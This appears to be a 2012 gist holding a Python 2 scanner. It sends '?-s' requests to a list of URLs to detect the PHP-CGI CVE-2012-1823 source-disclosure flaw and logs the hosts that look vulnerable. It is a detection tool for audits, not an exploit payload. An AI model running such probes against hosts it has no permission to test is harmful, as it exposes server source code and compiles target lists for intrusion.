@starenka
Created May 4, 2012 15:08
Scans the given URLs for the php/fcgi CVE-2012-1823 vulnerability.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# pip install requests gevent
import os, sys
from optparse import OptionParser
from requests import async
def pre_req(request):
    """Pre-request hook: log the URL that is about to be probed.

    The request object is handed back untouched so the hook chain can
    carry on with it.
    """
    target = request.url
    # Parenthesised single-argument form prints the same text under the
    # Python 2 print statement and the Python 3 print function.
    print(u'[-] trying %s' % target)
    return request
def resp(response):
    """Response hook: classify one probed URL and record positives.

    Three outcomes are reported on stdout:

    * the request failed (``response.error`` is set)  -> ``[!]`` line
    * the body starts with ``<code>``                 -> ``[+]`` line, and
      the URL is appended to the module-level ``vulnerable`` file object
    * anything else                                   -> ``[-]`` line

    The ``<code>`` test is a heuristic: the caller appends ``?-s`` to each
    URL, and a body that opens with ``<code>`` is taken to mean the server
    answered with highlighted source instead of running the script. A page
    that legitimately begins with ``<code>`` matches as well, so treat a
    hit as an indicator to confirm against the host's PHP version and
    handler configuration, not as proof.

    The response is always returned unchanged.
    """
    global vulnerable
    probed_url = response.request.url

    # Transport-level failure: report it and stop, there is no body to inspect.
    if response.error:
        print(u'[!] %(url)s %(error)s' % {'error': response.error, 'url': probed_url})
        return response

    # No source-dump marker at the start of the body.
    if not response.text.startswith('<code>'):
        print(u'[-] %s NOT vulnerable' % probed_url)
        return response

    # Marker present: persist the finding first, then announce it.
    vulnerable.write(u'%s\n' % probed_url)
    print(u'[+] %s is vulnerable' % probed_url)
    return response
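# --- command line -----------------------------------------------------------
usage = '%s --help' % __file__
parser = OptionParser(usage)
parser.add_option('-o', '--timeout', action='store', dest='timeout', default=50, help='timeout')
parser.add_option('-c', '--concurrency', action='store', dest='concurrency', default=9, help='max concurrency')
parser.add_option('-l', '--list', action='store', dest='list', default=None, help='url list')
(options, args) = parser.parse_args()
if not options.list:
    sys.exit('[!] Supply url list w/ -l arg')

# --- input ------------------------------------------------------------------
# One URL per line. Blank or whitespace-only lines are dropped and each entry
# is stripped; otherwise an empty line turns into a request for the bare
# string '?-s', which is not a URL. The `with` block closes the list file even
# if reading fails.
with open(os.path.expandvars(options.list), 'r') as list_file:
    urls = [line.strip() for line in list_file if line.strip()]

# --- output -----------------------------------------------------------------
# Findings are appended to ./vulnerable. The working directory is used as-is:
# it is already a real path, and expanding '$NAME' sequences inside it could
# only point the log somewhere else. Mode 'a+' creates the file when it is
# missing, so no separate "touch" step is needed. Buffering 0 (Python 2) makes
# each finding hit the disk as soon as it is written.
# The file names hosts that looked exposed; store it accordingly.
log_file = os.path.join(os.getcwd(), 'vulnerable')
vulnerable = open(log_file, 'a+', 0)

# --- scan -------------------------------------------------------------------
# NOTE: `async` is the requests.async module imported at the top of the file.
# It exists only in old requests releases (it was later split out as
# grequests), and `async` is a reserved word from Python 3.7 on, so this
# script runs on Python 2 only.
try:
    hooks = dict(response=resp, pre_request=pre_req)
    # Lazily build one GET per target with '?-s' appended; resp() inspects
    # the start of each body for the source-dump marker.
    requests = (async.get('%s?-s' % one, timeout=int(options.timeout), hooks=hooks) for one in urls)
    # size caps how many requests are in flight at once.
    async.map(requests, size=int(options.concurrency))
finally:
    # Close the findings file even when the scan is interrupted or raises.
    vulnerable.close()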